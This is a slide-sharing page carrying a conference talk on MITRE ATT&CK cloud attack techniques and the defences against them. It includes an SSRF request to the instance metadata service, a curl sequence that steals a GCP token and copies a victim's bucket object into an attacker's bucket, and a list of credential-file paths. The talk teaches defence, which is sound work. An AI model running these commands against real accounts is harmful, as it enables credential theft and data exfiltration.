Continuous Integration - Live Static Analysis with Puma Scan
Continuous Integration - Live Static Analysis with Puma ScanContinuous Integration - Live Static Analysis with Puma Scan
Continuous Integration - Live Static Analysis with Puma Scan
 

Recently uploaded

Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Principled Technologies
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Drew Madelung
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
Principled Technologies
 
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsTop 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Roshan Dwivedi
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
panagenda
 

Recently uploaded (20)

Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 
Top 10 Most Downloaded Games on Play Store in 2024
Top 10 Most Downloaded Games on Play Store in 2024Top 10 Most Downloaded Games on Play Store in 2024
Top 10 Most Downloaded Games on Play Store in 2024
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsTop 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 

Breaking The Cloud Kill Chain

  • 2. Eric Johnson • Principal Security Engineer, Puma Security → Coder: cloud infrastructure automation, CI / CD orchestration, static analysis engine, security tools → Security assessments: Cloud, DevOps, source code, web apps, mobile apps • Senior Instructor, SANS Institute → Contributing author of SEC540, SEC510, SEC549 • Education & Training → Iowa State M.S. Information Assurance, B.S. Computer Engineering → AWS Certified Developer, CISSP, GPCS, GSSP, GWAPT • Contact information → Email: ejohnson@pumasecurity.io → LinkedIn: https://www.linkedin.com/in/eric-m-johnson/ → Twitter: @emjohn20 $ aws sts get-caller-identity 2
  • 3. ŒCloud MITRE ATT&CK Framework Cloud Infrastructure Discovery ŽUnsecured Credentials Network Service Discovery Transfer Data to Cloud Account Agenda 3
  • 4. MITRE ATT&CK tactics covering cloud-based attack techniques: Understanding the Cloud Kill Chain 4
  • 5. The MITRE ATT&CK Cloud Matrix guides our attack methodology for the key cloud services: MITRE ATT&CK Cloud Services 5
  • 7. MITRE ATT&CK T1580: Discovering infrastructure and resources misconfigured for public cloud access: Cloud Infrastructure Discovery 7 • Storage buckets • Big data sets / databases • Container image repositories • Secrets and cryptographic keys • Virtual machine image or database snapshots
  • 8. AWS Exposable Resources, by Scott Piper, contains a list of non-VPC bound AWS resources that can also be exposed publicly: AWS Publicly Exposable Resources 8 • S3 Bucket ACLs and public bucket policy • EBS Volume Snapshots shared publicly • EC2 Amazon Machine Images shared publicly • ECR container image public repositories • RDS Database and Cluster Snapshots • SQS Queue public policy • SNS notification topics public policy • Lambda function URLs provided a dedicated HTTPS endpoint • More at https://github.com/SummitRoute/ aws_exposable_resources
  • 9. Big Query Datasets support sharing with allUsers and external cloud identity accounts: BigQuery Public Datasets 9
  • 10. 10 Azure Virtual Machines Disk Snapshots • Sharable with other users in the AD tenant • Supports direct downloads using SAS tokens • Provides a non-VNet bound way to exfiltrate snapshots
  • 11. Defending against resource misconfiguration starts with applying detective and preventative policies in the resource hierarchy: Breaking The Kill Chain: MITRE ATT&CK T1580 11 • Service Control Policy (SCP) • Azure Policy • Organization Policy AWS Azure GCP
  • 12. Service Control Policy (SCP) documents can attach to the root, OU, and account level nodes in the AWS organization: Breaking The Kill Chain: Cloud Resource Hierarchy 12
  • 13. 13 Breaking The Kill Chain: Service Control Policies { "Statement": [ { "Action": [ "s3:PutAccountPublicAccessBlock" ], "Resource": "*", "Effect": "Deny" } ] } 1 2 3 4 5 6 7 8 9 10 11 12 13 14 Example SCPs blocking API calls to modify public S3 and Lambda function URL configurations: { "Statement": [ { "Action": [ "lambda:CreateFunctionUrlConfig", "lambda:UpdateFunctionUrlConfig" ], "Resource": "arn:aws:arn:aws:lambda:*:*:function/*", "Effect": "Deny", "Condition": { "StringNotEquals": { "lambda:FunctionUrlAuthType": "AWS_IAM" … } 1 2 3 4 5 6 7 8 9 10 11 12 13 14
  • 15. MITRE ATT&CK T1522: Discovering insecurely stored IAM and service account credentials: Unsecured Credentials 15 Unsecured Credential Locations Bash History Configuration Files Source Code Version Control Instance Metadata Service Environment Variables
  • 16. Attackers target credentials that map to many different resource types across the cloud providers: Cloud Credential Types 16 • IAM Users & Roles • Service Principal & Managed Identity • Service Accounts AWS IAM Azure AD Cloud Identity
  • 17. Cloud-focused malware (e.g., TeamTNT) will focus on common locations with cleartext credentials: • ~/.aws/credentials • ~/.azure/accessTokens.json • ~/.config/gcloud/*credential* • ~/.ssh/* Configuration File Credentials 17
  • 18. • Node Package Manager • Scanned by Aidan Steele in October 2021 • Identifies 117 valid API keys, including 30 AWS root access keys • https://sec549.com/id259 Version Control and Package Managers 18 • Python Package Index (PyPI) • Scanned by Tom Forbes in January 2023 • Identifies 57 valid AWS API keys, including 11 AWS root access keys • https://sec549.com/id260
  • 19. 19 Environment Variable Credentials env | grep 'AWS' AWS_LAMBDA_FUNCTION_VERSION=$LATEST AWS_SESSION_TOKEN=IQoJb3JpZu2DaXVzLWVhc3Q...4pg9g== AWS_LAMBDA_LOG_GROUP_NAME=/aws/lambda/serverlessprey-panther AWS_LAMBDA_LOG_STREAM_NAME=2020/01/05/[$LATEST]786a6193a27eb390c0a AWS_DEFAULT_REGION=us-east-1 AWS_SECRET_ACCESS_KEY=aEWSwA8k/U7IY38JetxQDZ9voUG AWS_ACCESS_KEY_ID=ASIA54BL6EJRTTJ4SS7A 1 2 3 4 5 6 7 8 9 • Continuous Integration pipelines, containers, and functions often have secrets stored in environment variables • Local File Inclusion (LFI) and Command Injection vulnerabilities can allow attackers to exfiltrate environment variables
  • 20. 20 Server-Side Request Forgery Credential Extraction curl -s "https://nimbus.labs/api/emrs?resource=http://169.254.169.254/latest/meta- data/iam/security-credentials/nimbus-iam-role { "Code" : "Success", "LastUpdated" : "2020-04-16T18:36:31Z", "Type" : "AWS-HMAC", "AccessKeyId" : "ASIA54BL6PJR3MV6PUNZ", "SecretAccessKey" : "S0M6vF4UmMlfmV5B/bM2lalWpdTzocbUsSWMMHRI", "Token" : "IQoJb3JpZ2luX2VjEJP...3QtMSJGMEQCIGlgtwykQYitLv8Vg==", "Expiration" : "2020-04-17T00:52:19Z" } 1 2 3 4 5 6 7 8 9 10 11 12 Server-side Request Forgery (SSRF) vulnerabilities can allow attackers to communicate directly with virtual machine instance metadata services:
  • 21. Defending against unsecured credentials requires defense in depth controls: Breaking The Kill Chain: MITRE ATT&CK T1522 21 • Cloud Threat Detection • OpenID Connect Identity Provider Secrets Scanning Compromised Credential Detection Workload Identity Federation • Version Control Repositories
  • 22. Breaking The Kill Chain: Version Control Secrets Scanning 22 Perform incremental and continuous secrets scanning:
  • 23. Cloud-native threat detection capabilities have limited capabilities for finding stolen credentials: Breaking The Kill Chain: Cloud Threat Detection 23 AWS GuardDuty • *:IAMUser/ AnomalousBehavior • UnauthorizedAccess:IAMUser/ InstanceCredentialExfiltration. InsideAWS • UnauthorizedAccess:IAMUser/ InstanceCredentialExfiltration. OutsideAWS
  • 24. 24 Breaking The Kill Chain: Cloud Threat Hunting protoPayload: { @type: "type.googleapis.com/google.cloud.audit.AuditLog" authenticationInfo: { principalEmail: "cheetah-354157@appspot.gserviceaccount.com" principalSubject: "user:sec510-354157@appspot.gserviceaccount.com" } … methodName: "google.cloud.secrets.v1beta1.SecretManagerService.AccessSecretVersion" resourceName: "projects/123456789012/secrets/cheetah-database-pass/versions/latest" serviceName: "secretmanager.googleapis.com" requestMetadata: { callerIp: "95.025.143.109" callerSuppliedUserAgent: "curl/7.64.1,gzip(gfe),gzip(gfe)" … } } … timestamp: "2023-01-10T20:30:00.192825193Z" 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 Threat hunting will have to fill the gaps: Google Cloud Logging WHY IS A CLOUD FUNCTION SERVICE ACCOUNT… ACCESSING SECRETS… FROM AN EXTERNAL IP ADDRESS?
  • 25. Breaking The Kill Chain: Workload Identity Federation 25 Protip: Long-lived credentials must die!
  • 27. MITRE ATT&CK T1046: Enumerating resources with public IP addresses in the victim's cloud account: Network Service Discovery 27 • VPC-bound resource types include: • Virtual machines, load balancers, containers, datastores, Redis clusters, data lakes • Public cloud IP address blocks are well known • Large scale cloud network service discovery (e.g., Shodan, Nmap) • Cloud Scanning For Vulnerability Discovery by @joswr1ght • https://sec510.com/1042 • Identify remotely exploitable hosts and software
  • 28. EC2 instances created in the AWS Web Console auto-generate a new security group with default open admin access: • Linux VMs auto populate open SSH access • Windows VMs auto populate open RDP access AWS Default Virtual Machine Security Group 28
  • 29. Azure Virtual Machines created in the UI default to open admin access: • Linux VMs auto-populate open SSH access • Windows VMs auto-populate RDP access Azure Default Virtual Machine Network Access 29
  • 30. Default VPC contains pre-populated firewall rules allowing wide open administrative access: GCP Default Network Firewall Rules 30
  • 31. Shodan searching for virtual machines on Google Compute Engine exposing SSH and RDP ports: Misconfigured GCP Firewall Rules 31
  • 32. Defending against network service discovery requires organizations to build more advanced network architectures: Breaking The Kill Chain: MITRE ATT&CK T1046 32 • Shared VPC & Transit Gateway • Azure Virtual WAN • Shared VPC, Cloud Routing, Peering, VPN AWS Azure Google Cloud
  • 33. Centralize VPC resources into a single network host account (or project) in the resource hierarchy: Breaking The Kill Chain: VPC Sharing 33 • VPC networks & subnets • Internet & NAT Gateways • Public IP addresses • Route tables • Firewall rules → NACLs → Security Groups • VPC Endpoints
  • 34. 34 Breaking The Kill Chain: Restricting Public Network Connectivity { "Sid": "RestrictPublicConnectivityToInfrastructureAccounts", "Effect": "Deny", "Action": [ "ec2:AllocateAddress", "ec2:AttachInternetGateway", "ec2:CreateInternetGateway", "ec2:CreateEgressOnlyInternetGateway", "ec2:CreateVpcPeeringConnection", "ec2:AcceptVpcPeeringConnection", "globalaccelerator:Create*", "globalaccelerator:Update*" ], "Resource": "*", "Condition": { "StringNotEquals": { "aws:PrincipalAccount": [ "123456789012" ] … } 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 Preventing unauthorized public network access: ACTIONS CREATING PUBLIC CONNECTIVITY… DENY…. EXCEPT FOR THE NETWORK HOST ACCOUNT
  • 35. Breaking The Kill Chain: Centralized Resource Configurations 35 Centralizing network resources into the network host account provides a single pane of glass for public connectivity: PUBLIC INVENTORY
  • 36. Breaking The Kill Chain: Centralized Inbound, Outbound, Traffic Inspection 36
  • 37. T1537: Transfer Data to Cloud Account
  • 38. MITRE ATT&CK T1537: Exfiltrating data from the victim's cloud account by escalating privileges and transferring data on the cloud provider's backbone network to avoid network-based detection Transfer Data to the Attacker's Cloud Account 38 • Compromising over permissioned service accounts • Impersonating a target service account • Transferring data across the cloud provider's backbone network • Pivoting with stolen credentials
  • 39. 39 Privilege Escalation: Azure Overly Scoped Role Definition { "assignableScopes": [ "/subscriptions/${var.subscription_id}" ], "permissions": [ { "actions": [ "Microsoft.Storage/storageAccounts/listKeys/action", "Microsoft.Storage/storageAccounts/ListAccountSas/action", "Microsoft.Storage/storageAccounts/read" ], } ], "roleName": "Storage Access" } 1 2 3 4 5 6 7 8 9 10 11 12 13 Example role definition allowing excessive permissions and overly scoped access to resources: SUBSCRIPTION-WIDE SCOPE TO ALL STORAGE ACCOUNTS
  • 40. Google Cloud's Primitive Editor role has permission to view, modify, and delete existing project resources (with a few exceptions): • Default role assigned to Compute instances, App Engine services, and Cloud Functions • Too permissive for what your workload needs in production • Has over 4,000 assigned permissions on the project • Attackers compromising workloads with Editor permissions can access data across the project Privilege Escalation: Google Cloud's Primitive Editor Role 40
  • 41. Transitive privilege escalation occurs by creating a resource that inherits permissions from a supplied service account: • AWS: iam:PassRole permission • GCP: iam.serviceAccounts.actAs permission Privilege Escalation: Transitive Permission Assignment 41 Create a Compute Instance Configure Compute to Run as the target service account Obtain token through the Instance Metadata Server (IMDS) Impersonate Privileged Service Account in Project
  • 42. Attackers leverage private service access (private link) to exfiltrate data across the cloud provider's backbone network: • Private link services are designed to help customers keep data from traversing the Internet • Default policy (AWS, GCP) allows multi- tenant access to the cloud provider APIs • May allow data to move cross-tenant between resources without network and firewall inspection Data Exfiltration: Transferring Data Cross Tenant 42
  • 43. 43 Data Exfiltration: Stolen Credential Pivoting export BEARER_TOKEN=$(curl -s -H "Metadata-Flavor: Google" http://metadata.google.internal/ computeMetadata/v1/instance/service-accounts/default/token | jq -r .access_token) # List all storage buckets in the victim's project curl -s -H "Authorization: Bearer $BEARER_TOKEN" "https://storage.googleapis.com/storage/v1/b?project=victims-project" # Copy objects from the victim's bucket curl -s -X POST -H "Authorization: Bearer $BEARER_TOKEN" https://storage.googleapis.com/storage/v1/b/victims-bucket/o/data.pdf/copyTo/b/attackers- bucket/o/data.pdf 1 2 3 4 5 6 7 8 9 10 11 Exfiltrating data from the victim's Google Cloud project using the stolen credential:
  • 44. Defending against privilege escalation and data exfiltration requires additional cloud-native controls to prevent data from leaving the organization's tenant: Breaking The Kill Chain: MITRE ATT&CK T1537 44 • IAM Access Analyzer • IAM Recommender • Private Link Services • Network Access Rules • VPC Service Controls AWS / GCP AWS / Azure Google Cloud
  • 45. Breaking The Kill Chain: IAM Recommender 45 Reviewing IAM Recommender reports and reducing excessive permissions:
  • 46. Breaking The Kill Chain: Service Endpoint Configuration 46 Preventing data exfiltration with private link services and network access policy:
  • 47. Breaking The Kill Chain: VPC Service Controls 47 Configuring a VPC Service Controls perimeter to prevent data exfiltration: • Perimeter includes the authorized projects • In-scope services include the GCS storage service • Unauthorized projects and external clients cannot interact with the target GCS bucket
  • 49. Breaking The Cloud Kill Chain requires an in-depth understanding of cloud-native services and configurations: Closing Remarks Resources can be made public too easily, build guardrails with the policy hierarchy Credential management continues to be a problem, move to workload identity federation Cloud resources are Internet exposed too easily, central network inspection is critical New ways to hide & exfiltrate data exist, focus on building network identity perimeters
  • 50.
  • 51. 51
  • 52. Thank you for attending! Questions? 52